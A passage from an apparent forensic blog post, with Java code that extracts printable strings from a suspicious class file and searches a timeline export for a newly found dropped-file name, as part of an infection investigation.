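    public static java.util.List<String> printable(byte[] data, int minLen) {
        java.util.List<String> found = new java.util.ArrayList<>();
        StringBuilder run = new StringBuilder();
        for (byte b : data) {
            if (b >= 0x20 && b < 0x7F) {            // printable ASCII range
                run.append((char) b);
            } else {
                if (run.length() >= minLen) found.add(run.toString());
                run.setLength(0);                   // non-printable byte ends the run
            }
        }
        if (run.length() >= minLen) found.add(run.toString());
        return found;
    }

    public static void main(String[] args) throws IOException {
        java.nio.file.Path p = Paths.get("CL4.class"); // hypothetical exported class file
        if (Files.exists(p)) {
            for (String s : printable(Files.readAllBytes(p), 4)) System.out.println(s);
        }
    }
}
```

The constant-pool strings (URLs, dropped file names, class references) fall straight out of the dump this way.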

It's difficult to make this output easy to read, but the areas of interest stand out: an additional file (/mor.exe) and a URL on the same site we'd previously discovered. Overall I was fairly happy to find an additional artifact to search for, although unfortunately I did not find it in this instance.
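With a concrete artifact name in hand, the pivot back into the timeline is just a case-insensitive search (a one-line `grep -i` does the same job). A sketch of that search in Java, assuming a hypothetical line-oriented timeline export called `timeline.csv`:

```java
import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;

// Sketch of the pivot itself: scan a timeline export line by line for a
// newly discovered artifact name, case-insensitively (like `grep -i`).
public class TimelineGrep {
    public static java.util.List<String> grep(BufferedReader in, String needle) throws IOException {
        java.util.List<String> hits = new java.util.ArrayList<>();
        String lower = needle.toLowerCase();
        String line;
        while ((line = in.readLine()) != null) {
            if (line.toLowerCase().contains(lower)) hits.add(line);
        }
        return hits;
    }

    public static void main(String[] args) throws IOException {
        java.io.File f = new java.io.File("timeline.csv"); // hypothetical export name
        if (f.exists()) {
            try (BufferedReader in = new BufferedReader(new FileReader(f))) {
                for (String hit : grep(in, "mor.exe")) System.out.println(hit);
            }
        }
    }
}
```

Every hit is a candidate pivot point: a timestamped line tying the dropped file to surrounding filesystem and browser activity.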

I hope you find this useful, and hopefully some of you will comment on more efficient ways of doing what I've done above. I'd love to hear any advice from anyone who does this on a more regular basis.